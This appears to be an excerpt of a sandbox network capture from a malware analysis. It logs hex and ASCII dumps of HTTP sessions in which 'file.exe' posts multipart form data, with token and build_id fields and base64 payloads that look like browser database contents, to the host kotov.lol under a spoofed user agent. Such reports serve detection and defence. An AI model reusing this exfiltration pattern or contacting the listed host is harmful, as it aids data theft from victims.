2024-11-29 11:27:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:49 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-11-29 11:27:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:49 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:27:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49735	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:51 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:51 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------FBKJDGCGDAAAKECAKKJDCont
2024-11-29 11:27:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49742	94.245.104.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:56 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:27:56 UTC	584	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Fri, 29 Nov 2024 11:27:56 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=1126f8913d8e3f0ad6200b0ed68ff383e852f8c2c11952a490e484488dbfc120;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=1126f8913d8e3f0ad6200b0ed68ff383e852f8c2c11952a490e484488dbfc120;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49744	20.190.181.0	443

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:57 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-29 11:27:57 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-29 11:27:58 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 29 Nov 2024 11:26:58 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C516_BAY x-ms-request-id: c05da47e-2642-4430-bbe2-64df8d4acc48 PPServer: PPV: 30 H: PH1PEPF00011E7C V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 29 Nov 2024 11:27:57 GMT Connection: close Content-Length: 11390
2024-11-29 11:27:58 UTC	11390	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49748	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:58 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJJEBFCGDAKFIEBAAFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 3161 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:58 UTC	3161	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------KKJJEBFCGDAKFIEBAAFBCont
2024-11-29 11:27:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49752	142.250.181.65	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:58 UTC	594	OUT	GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:27:59 UTC	573	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 138356 X-GUploader-UploadID: AFiumC4jWX8ufhNTbg53S2k-KXfhO0i2cuiMjWxTrZ3_LqIvaTjsGDXzf1Hk0_AlqTwViQ5R9QmXdlspDQ X-Goog-Hash: crc32c=ld9IFg== Server: UploadServer Date: Thu, 28 Nov 2024 16:45:00 GMT Expires: Fri, 28 Nov 2025 16:45:00 GMT Cache-Control: public, max-age=31536000 Age: 67379 Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-29 11:27:59 UTC	817	IN	Data Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-11-29 11:27:59 UTC	1390	IN	Data Raw: 5f b2 be 56 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c Data Ascii: _V_q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"\|F\|Vw%t.y.?&a<nS+\|=ra'}(pW9sC&jJ-''B0u?.;4BN\
2024-11-29 11:27:59 UTC	1390	IN	Data Raw: 8e b5 a1 c8 fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FS
